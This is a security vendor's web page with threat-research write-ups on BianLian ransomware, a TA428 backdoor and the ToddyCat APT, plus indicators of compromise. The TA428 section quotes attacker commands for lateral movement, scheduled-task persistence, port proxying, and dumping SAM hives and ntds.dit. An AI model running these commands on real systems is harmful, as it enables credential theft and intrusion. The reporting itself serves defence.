loading..

Product

Our Product

We are Reshaping the way companies find and fix critical vulnerabilities before they can be exploited.

loading..

Threatspy

Solutions

By Industry

Health Care

Education

IT & Telecom

By Role

Government

CISO/CTO

DevSecops

Resources

Resource Library

Get actionable insight straight from our threat Intel lab to keep you informed about the ever-changing Threat landscape.

loading..

Threat Feeds

loading..

Threat Research

loading..

White Paper

loading..

SB Blogs

Subscribe to Our Weekly Threat Digest

Company

Contact Us

Have queries, feedback or prospects? Get in touch and we shall be with you shortly.

loading..

Our Story

loading..

Our Team

loading..

Careers

Press & Media

loading..

Contact Us
loading..
loading..

Join the waitlist

loading..

By submitting this form, you agree to our Subscription Agreement and Legal Policies.

background
background
loading..
loading..
loading..
Loading...

Phishing

Twilio

EvilProxy

loading..
loading..
loading..

EvilProxy: Scaling Phishing Attacks Keeping MFA At Bay

EvilProxy operators leverage Reverse Proxy & Cookie Injection methods to evade MFA – proxyfying victim’s session...

loading..
  21-Sep-2022
loading..
 7 min read

Related Articles

loading..

Golang

BianLian

Ransomware

Increases in the command and control infrastructure of the new cross-platform ra...

Secure Blink threat researchers have observed that Golan-based malware has grown in prominence, most likely due to its cross-platform functionalities and the fact that it makes reverse engineering even more complex. Threats developed using the Go language, such as Ransomware, RAT, Stealer, etc. The ransomware has targeted many well-known organizations (9 victims so far) across several industry sectors such as Manufacturing, Education, Healthcare, BFSI, etc. across Australia, North America, and the United Kingdom, primarily targeting SonicWall VPN devices and the Microsoft Exchange Server ProxyShell vulnerability chain (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207). ## Attack Flow The ransomware group first exploits the ProxyShell flaws to obtain access and then installs a Web shell or ngrok payload to monitor the victim's activity. According to analysts, the gang has taken precautions to avoid detection and minimize observable events as it seeks for data and selects machines to encrypt. According to the paper, BianLian deployed typical _"living off the land"_ (LoL) techniques for network profiling and lateral mobility. These included net.exe for adding and/or modifying user rights, netsh.exe for configuring host firewall policies, and reg.exe for modifying remote desktop and security policy enforcement registry settings. In addition to utilizing LoL techniques, the group is also known to deploy a bespoke implant as an additional method for sustaining constant network access. This _"simple but effective"_ backdoor's primary purpose is to retrieve arbitrary payloads from a remote server, load them into memory, and then execute them. BianLian has demonstrated proficiency with lateral movement techniques, altering their operations based on the network's capabilities and defenses, according to the assessment. BianLian, like other new cross-platform ransomware such as Agenda, Monster, and RedAlert, is capable of starting servers in Windows Safe Mode to execute its file-encrypting malware while evading detection by system-installed security solutions. In addition to deleting snapshots, removing backups, and running its Golang encryption module via Windows Remote Management (WinRM) and PowerShell scripts, additional methods were taken to evade security obstacles. The group's emergence contributes to the expanding number of threats utilizing Golang as a base language, which enables adversaries to make rapid modifications to a single code base that can subsequently be produced for various platforms. In the figure below, we have prepared a breakdown of the industries targeted by the BianLian ransomware ![Fig 1 Top Industries Targeted By BianLian.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Fig_1_Top_Industries_Targeted_By_Bian_Lian_0ff434142a.jpg) ***Figure 1 – Industries Targeted by the BianLian Ransomware*** ## Technical Analysis For this evaluation, we used the hash of the 64-bit GoLang binary executable `eaf5e26c5e73f3db82cd07ea45e4d244ccb3ec3397ab5263a1a74add7bbcb6e2 (SHA256)` Below is the unique build ID of the GoLang ransomware. ![Figure-2-Go-Build-ID.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_2_Go_Build_ID_59c0dc90f7.jpg) ***Figure 2 – Go Build Identifier*** When the ransomware is executed, it checks the wine get version() method using the GetProcAddress() API to see if the file is operating in a WINE environment. ![Figure-3-Anti-analysis-Technique.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_3_Anti_analysis_Technique_2a561317e6.jpg) ***Figure 3 – Anti-analysis Technique*** After that, the ransomware uses the CreateThread() API call to generate numerous threads in order to encrypt files more quickly, making it more challenging to reverse engineer the malware. The diagram below depicts the many threads produced by the ransomware. ![Figure-4-Multiple-Thread-Creation.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_4_Multiple_Thread_Creation_e229ce428e.jpg) ***Figure 4 - Creation of Multiple Threads*** Using the GetDriveTypeW() API function, the malware then identifies the system drives (from A: to Z:) and encrypts all files available on the associated devices. The malware then dumps a ransom letter with the filename "Look at these instructions.txt" in various folders. The ransomware generates a notice with the following content. ![Figure-5-Malware-Writing-Ransom-Notes(1).jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_5_Malware_Writing_Ransom_Notes_1_c0696f0499.jpg) ***Figure 5 - Depicts malware composing ransom notes*** After dropping the ransom message, the malware enumerates files and directories using the FindFirstFileW() and FindNextFileW() API calls to search for encryption. The following file extensions and file/folder names are exempt from encryption by the ransomware: On the victim's encryption, the ransomware encrypts files using GoLang Packages including crypto/cipher, crypto/aes, and crypto/rsa. ![Figure-6-Hardcoded-Strings-of-Crypto-GoLang-Packages.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_6_Hardcoded_Strings_of_Crypto_Go_Lang_Packages_d010aaa382.jpg) ***Figure 6- Hardcoded "Crypto" Strings in GoLang Packages*** The malware separates the file's contents into 10-byte chunks for encryption purposes. It first takes 10 bytes from the source file, encrypts them, and then writes the encrypted data to the destination file. It is possible to avoid detection by anti-virus software by slicing the data into little pieces. The image below depicts the code fragment of the encryption loop as well as the original and infected file contents prior to and after encryption. ![Figure-7-Encryption-routine-and-OriginalEncrypted-file-content(1).jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_7_Encryption_routine_and_Original_Encrypted_file_content_1_1f64c44f2e.jpg) ***Figure 7 – Encryption algorithm and original/encrypted file content*** As demonstrated below, the malware then renames the encrypted files with the ".bianlian" extension and replaces them with the original file using the MoveFileExW() API method. ![Figure-8-MoveFileExW-API.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_8_Move_File_Ex_W_API_ad5aeb0ba6.jpg) ***Figure 8 - MoveFileExW() API*** Using the following command line, the ransomware deletes itself, leaving just the encrypted files and the ransom notice on the victim's computer. `cmd /c del C:UsersAdmin>Desktopnew one.exe` The image below depicts the BianLian ransomware encrypted files and ransom note text file after a victim's computer has been successfully infected. ![Figure-9-Files-encrypted-by-BianLian-Ransomware.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_9_Files_encrypted_by_Bian_Lian_Ransomware_1902703a73.jpg) ***Figure 9 - BianLian ransomware-encrypted files*** In the ransom note, victims are instructed on how to contact the threat actors in order to get their encrypted files restored. If the ransom is not paid within ten days, the threat actors threaten that their victims' sensitive information, including financial, client, company, technical, and personal files, has been downloaded and will be uploaded on their leak site. The ransom message also includes the TOX Messenger ID for ransom discussions as well as the Onion URL of the leak site page, as depicted in the figure below. ![Figure-10-Ransom-note.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_10_Ransom_note_c41d6ad983.jpg) ***Figure 10 – Ransom note*** The image below depicts the BianLian ransomware Onion leak homepage and the extortion items of the affected company. ![Figure-11-BianLian-Leak-site-home-page.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_11_Bian_Lian_Leak_site_home_page_e500fded0f.jpg) ***Figure 11 -The homepage of the BianLian Leak website is depicted*** The BianLian Leak website offers a list of all firms hit by ransomware and the contact information for the TA for ransomware data recovery. ![Figure-12-BianLian-Leak-site-affected-companies-list-TAs-contact-details.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_12_Bian_Lian_Leak_site_affected_companies_list_T_As_contact_details_95d66ee6b9.jpg) ***Figure 12 - List of BianLian Leak site affected companies and contact information for threat actors*** ## Conclusion Organizational efficiency and security are two areas that are being negatively impacted by the rise of ransomware as an attack vector. BianLian is a GoLang-based malware that has infiltrated several businesses and is demanding astronomical sums in return for decryption keys. The threat actors use a twofold extortion strategy, taking data from the victimized company and then publishing it online if the ransom is not paid in a timely fashion. For different reasons, threat actors choose to create their ransomware in GoLang because it allows a single codebase to be compiled into all main operating systems. The threat actors in charge of BianLian are constantly adapting and expanding their toolset so as to remain undetected. Secure Blink will keep an eye out for BianLian and similar Ransomware gangs and evaluate their actions to learn more about their goals.

loading..
  16-Sep-2022
loading..
  1 min read
loading..

APT

Backdoor

TA428

CotSam: a never seen before malware strain involved in the targeted attacks acro...

In the course of our threat research, we have discovered a new backdoor that differs from every other one utilized in assaults that researchers have linked to TA428. We chose to call the malware Backdoor because of its resemblance to the Cotx backdoor. Win32.team. The attackers employed two techniques for simultaneously deploying the malware while building the attack. In the first instance, the malware was sent along with a weak version of Microsoft Word. For 32-bit computers, Microsoft Word 2007 was employed, and for 64-bit platforms, Microsoft Word 2010. Following launching WINWORD.EXE, a DLL hijacking vulnerability was used to gain control and send it to the malicious library wwlib.dll, which used a straightforward xor operation and the key 0xAA to decrypt the file OEMPRINT.CAT from the current directory. ![TR1.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/TR_1_e97461df8e.jpg) The executable file that has been decrypted is then directly written to the memory of the svchost.exe process using the WriteProcessMemory method. In the second instance, the attackers took advantage of the applaunch.exe program's DLL hijacking vulnerability (`MD5: 170D73BE3FE846E9070CFAE530F5A31C`). It's important to note that other Chinese organizations had previously disseminated ShadowPad malware using the identical version of applaunch.exe. The backdoor connects to the CnC server and waits for commands after extracting the proxy server's parameters from the registry value `HKCUSoftwareMicrosoftWindowsCurrentVersionInternet SettingsProxyServer.` ### LATERAL MOVEMENT The attackers attempt to distribute the malware to further computers connected to the workplace network after taking control of the initial system. The attacker's current goal is to get access to the domain controller and take complete control of the infrastructure of the company being attacked. Attackers exploit a remote shell supplied by backdoor malware to launch their tools and retrieve operation results. In the course of our investigation, we discovered a number of hand-entered commands that the attackers used to execute a set of commands on infected systems (this is indicated both by the time intervals between orders and by the output of results not being redirected anywhere except standard output). Majority of the attacks were performed using the NBTscan console tool, which was downloaded to victims' PCs as a.cab archive called ace.cab and unpacked using the expand system tool: `expand.exe ace.cab ace.exe` `ace -n 172.22.0.0/16` We also saw the employment of the Ladon hacking framework in a few instances. The framework is made up of a variety of modules with various lateral movement functionality, such as: - Scanning the network and finding different types of devices. - Identifying and exploiting vulnerabilities in the devices found. - Cracking passwords for resources on the network. - Scanning for password hashes. - Scanning for passwords in text files. - Remotely executing arbitrary code. ![TR2.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/TR_2_6ec25456fe.jpg) While these tools are getting heavily leveraged by attackers, they are empowered to scan the whole network architecture and discover the systems most exposed to attack. Additionally, the hackers gathered data about system users and their network connections. They were particularly interested in RDP connections: `query user` `net user` `net group` `ipconfig /all` `netstat -no` `netstat -no | findstr 3389` `netstat -ano | findstr 2589` ### Distribution of Malware Using the results of network scanning and user credentials that they had already obtained, the attackers were able to spread their infection from one system to the next. They utilized the net use and xcopy programs to connect to distant systems and install malware on those systems: `net use \\[IP address]\IPC$ "[password]" /u:"[user name]"` `xcopy.exe /s \\[IP address]\c$\windows\web\*" $windir\Web\ /y /e /i /q` An open-source VBS script called wmic.vbs was occasionally used to deliver malware, and the attackers also downloaded it to remote systems: `cscript.exe //nologo wmic.vbs /cmd [IP address] [user name][password] $appdata\ABBYY\Install.exe` Although the VBS script was initially created as a penetration testing tool, threat actors frequently employ it in actual attacks. Using WMIC, the script wmic.vbs performs commands for a user account with administrative rights (Windows Management Instrumentation Command-line). Here Windows Task Scheduler is used by attackers to create task in other instances to ensure that the virus launched automatically: `schtasks /create /tn CacheTasks /tr “$appdata\ABBYY\FineReader\WINWORD.EXE” /sc minute /mo 50 /ru “” /f` Attackers who were able to access closed networks—networks not directly connected to the internet—turned intermediate systems—systems accessible from closed networks while also being connected to the internet—into proxy servers in those situations. This made it possible for malware to communicate with its CnC servers while running on computers connected to closed networks. In this scenario, configuring network traffic redirection was a simple process that could be completed with the use of built-in Windows tools: `netsh interface portproxy add v4tov4 2589 <IP address> 443` ### Domain Hijacking The attackers took the whole database of Active Directory user password hashes after taking control of the domain controller. To do this, they first used a unique cmd command to store a copy of the system registry hives: `reg save HKLM\SAM sam.save` `reg save HKLM\SECURITY security.save` Following that, they copied the ntds.dit file, which houses the Active Directory database and user password hashes. Curiously, the system constantly uses the file ntds.dit and prevents ordinary copying tools from working on it. The attackers circumvented this restriction by employing a specific tool made to copy the file via the Windows volume shadow copy service (VSS). ![TR3.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/TR_3_2456e3d8ab.jpg) An example of a command launching the utility is shown below: `c:\programdata\microsoft\sc64.exe c:\windows\ntds\ntds.dit` `c:\programdata\microsoft\ntds.dit` The attackers acquired logins and password hashes for each user on the domain by using the system registry's contents and the file ntds.dit. In order to obtain the login credentials for the majority of users from the domain of the attacked company, the attackers next utilized hash cracking. In circumstances where an attacked organization's IT architecture had many domains, the attackers examined trust relationships between the domains to locate accounts that allowed them to migrate laterally: `nltest /domain_trusts` Attackers gained access to a domain controller and, among other things, the password hash for the user krbtgt (an Active Directory service account), allowing them to launch the Golden Ticket attack. For an unlimited period of time, it permitted them to independently issue Kerberos tickets (TGT) and perform authentication on any Active Directory service. The security team of the attacked firm in one of the cases examined unusual activity on the domain controller, and as a result, changed the passwords of users whose accounts had been compromised. However, the attackers proceeded to use Kerberos tickets to act without incident on behalf of these accounts. This demonstrates that traditional incident response techniques are ineffective in the event of a Golden Ticket attack. Last but not least, it's important to remember that in one of the incidents, the attackers were also successful in gaining access to the server hosting the system that regulates security solutions and remotely changing the settings of the endpoint security products the company was using. Our findings derived from this [threat research](https://www.secureblink.com/threat-research) demonstrates that spear phishing is still one of the most important risks to commercial companies and government institutions. The majority of the malware employed by the attackers has known backdoor software, along with common lateral movement strategies and antivirus solution evasion techniques. They could access dozens of businesses simultaneously and even take over the complete IT infrastructure, IT security measures, and some of the targeted firms. Assault series we have identified is not the first in the campaign, and given the attackers' level of success, we think it is quite probable that they will carry out other attacks along these lines in the future. Public and private organizations should implement comprehensive efforts to deter such attacks evident across cyberspace.

loading..
  09-Aug-2022
loading..
  1 min read
loading..

APT

A new APT group, tracked as ToddyCat, to a series of attacks targeting entities ...

ToddyCat APT, is a Chinese-speaking threat group involved in an ongoing cyberespionage campaign primarily targeting government and military sectors across Europe and Asia with a key focus on compromising multiple Microsoft Exchange servers leveraging two malicious programs – Samurai backdoor & Ninja Trojan. It is termed to be a fairly new sophisticated APT group, even though spotted for the first time back in December 2020 when it launched several attacks against the targets' Microsoft Exchange servers. As ToddyCat began to take advantage of the [ProxyLogon vulnerability on Microsoft Exchange Servers](https://www.secureblink.com/cyber-security-news/proxylogon-patching-frenzy-in-microsoft-exchange-servers) to infiltrate various enterprises across Europe and Asia, with a steady rise in February-March 2021. The APT group concentrated their focus on the system used by Asian diplomatic and governmental organizations in September 2021. And keeps its armament up to date and will still launch assaults in 2022. Although the primary infection vector for the most recent activity is unknown, the researchers have thoroughly examined the malware employed in the operations. ToddyCat uses the advanced cyberespionage tools Samurai Backdoor and Ninja Trojan, which may sneak into targeted networks and remain undetected for extended periods of time. As the last stage of the assault, Samurai is a modular backdoor that enables the attacker to control the remote system and move laterally within the infected network. Because it jumps between instructions using various control flow and case statements, this malware stands out because it makes it difficult to follow the sequence of events in the code. Additionally, it is used to launch the Ninja Trojan, a sophisticated tool that enables several users to operate on the same machine at once. Ninja Trojan offers a broad range of commands as well, enabling attackers to manage distant computers covertly. It is often launched by a variety of loaders after being loaded into a device's memory. Before fully infiltrating a vulnerable network, the Ninja Trojan begins the operation by obtaining configuration parameters from the encrypted payload. The malware's capabilities, which may be dynamically modified using a specific command, include manipulating file systems, launching reverse shells, forwarding TCP packets, and even seizing control of the network for specified periods of time. The malware also shares similarities with other well-known post-exploitation frameworks, such [CobaltStrike](https://bit.ly/3tbOxSN), but Ninja has additional capabilities that allow it to restrict the number of direct connections from the targeted network to the remote command and control systems without internet access. Additionally, it has the ability to alter HTTP header and URL paths in order to hide dangerous traffic in HTTP requests and manage HTTP indicators. Ninja Trojan is especially covert thanks to these abilities. "ToddyCat is a highly skilled threat actor with advanced technological abilities who can slip past security measures and infiltrate elite organizations. We still lack total visibility into their operations and strategies despite the amount of loaders and attacks that have been identified over the past year. A further remarkable feature of ToddyCat is its emphasis on advanced malware capabilities. Ninja Trojan earned its name because it is difficult to detect and, thus, difficult to eradicate. Using multi-layer defenses that offer information on internal assets and keep abreast of the most recent threat intelligence is the best approach to deal with this type of danger, according to Giampaolo Dedola, a security expert at Kaspersky. From February 26 until the beginning of March, we saw a rapid escalation and the attacker taking advantage of the ProxyLogon vulnerability to target numerous businesses in Europe and Asia. In December 2020, the organization began using the Microsoft Exchange vulnerability, but there wasn't enough data to confirm the theory. In any event, it's important to note that all of the targeted devices attacked between December and February were Microsoft Windows Exchange servers, which were infected using an unknown exploit and the same attack chain as that employed in March. In the first round of attacks, only Microsoft Exchange Servers were targeted. These servers had been infected with Samurai, a sophisticated passive backdoor that typically operates on ports 80 and 443. The malware allows for the execution of arbitrary C# code and is combined with a number of modules that let the attacker control the remote system and move laterally throughout the targeted network. The Samurai backdoor was also exploited in some specific instances to run a more sophisticated malicious program that we called Ninja. This tool is possibly a part of a post-exploitation toolbox that ToddyCat uses only. The logic of the code suggests that Ninja is a collaborative tool that enables numerous operators to operate the same machine at once. It offers a broad range of commands that would let attackers take control of distant computers, evade detection, and get really inside a target network. Some of the features are comparable to those offered by other well-known post-exploitation toolkits. The number of direct connections from the targeted network to the remote C2 and control systems without internet access, for instance, can be restricted using a capability similar to Cobalt Strike pivot listeners in Ninja. By altering HTTP header and URL paths, it also offers the capability of controlling HTTP indicators and hiding malicious traffic in HTTP requests that seem legal. This feature has elements that bring to mind the Malleable C2 profile from Cobalt Strike. Since its initial appearance in December 2020, ToddyCat has continued to be quite active, particularly in Asia, where we have found numerous more variations of loaders and installers that are used to load malware like Samurai and Ninja. Other waves of attacks against desktop computers that had been infected by Telegram-sent malicious loaders were also seen. While ToddyCat has been a sophisticated APT group equipped with multiple techniques to evade detection and manage to maintain a low profile. Throughout the entire investigation, multiple samples were discovered; however, despite the number of files and the duration of their activities, the attribution of the attacks to a known group could not be performed. ### Indicators of Compromise 5cfdb7340316abc5586448842c52aabc Dropper google.log 93c186c33e4bbe2abdcc6dfea86fbbff Dropper 5a912beec77d465fc2a27f0ce9b4052b Dll Loader Stage 2 iiswmi.dll f595edf293af9b5b83c5ffc2e4c0f14b Dll Loader Stage 3 websvc.dll 5a531f237b8723396bcfd7c24885177f Dll Loader Stage 2 fveapi.dll 1ad6dccb520893b3831a9cfe94786b82 Dll Loader Stage 2 fveapi.dll f595edf293af9b5b83c5ffc2e4c0f14b Dll Loader Stage 3 sbs_clrhost.dll 8a00d23192c4441c3ee3e56acebf64b0 Samurai Backdoor 5e721804f556e20bf9ddeec41ccf915d Ninja Trojan Other variants 33694faf25f95b4c7e81d52d82e27e7b 1.dll – Installer 832bb747262fed7bd45d88f28775bca6 Техинстр egov – ГЦП – Акрамов.exe – Loader 8fb70ba9b7e5038710b258976ea97c98 28.09.2021. Управление ИР и ИС.exe – Loader ee881e0e8b496bb62ed0b699f63ce7a6 Loader ae5d2cef136ac1994b63c7f8d95c9c84 Loader 5c3bf5d7c3a113ee495e967f236ab614 System.Core.dll – Loader bde2073dea3a0f447eeb072c7e568ee7 wabext.dll – Loader 350313b5e1683429c9ffcbc0f7aebf3b rcdll.dll – Loader Ninja C2 149.28.28[.]159 eohsdnsaaojrhnqo.windowshost[.]us File paths C:\inetpub\temp\debug.exe C:\Windows\Temp\debug.exe C:\Windows\Temp\debug.xml C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Temporary ASP.NET Files\web.exe C:\Users\Public\Downloads\dw.exe C:\Users\Public\Downloads\chrome.log C:\Windows\System32\chr.exe C:\googleup.exe C:\Program Files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\googleup.log C:\google.exe C:\Users\Public\Downloads\x64.exe C:\Users\Public\Downloads\1.dll C:\Program Files\Common Files\microsoft shared\WMI\iiswmi.dll C:\Program Files\Common Files\microsoft shared\Triedit\Triedit.dll C:\Program Files\Common Files\System\websvc.dll C:\Windows\Microsoft.NET\Framework\sbs_clrhost.dll C:\Windows\Microsoft.NET\Framework\sbs_clrhost.dat C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Temporary ASP.NET Files\web.xml C:\Users\Public\Downloads\debug.xml C:\Users\Public\Downloads\cache.dat C:\Windows\System32\config\index.dat C:\Windows\Microsoft.NET\Framework\netfx.dat %ProgramData%\adobe\2.dll %ProgramData%\adobe\acrobat.exe %ProgramData%\git\git.exe %ProgramData%\intel\mstacx.dll %ProgramData%\microsoft\drm\svchost.dll %ProgramData%\microsoft\mf\svchost.dll %ProgramData%\microsoft\mf\svhost.dll %program files%\Common Files\services\System.Core.dll %public%\Downloads\1.dll %public%\Downloads\config.dll %system%\Triedit.dll %userprofile%\Downloads\Telegram Desktop\03.09.2021 г.zip %userprofile%\Downloads\Telegram Desktop\Тех.Инструкции.zip %userprofile%\libraries\1.dll %userprofile%\libraries\chrome.exe %userprofile%\libraries\chrome.log %userprofile%\libraries\config.dll C:\intel\2.dll C:\intel\86.dll C:\intel\x86.dll

loading..
  25-Jun-2022
loading..
  1 min read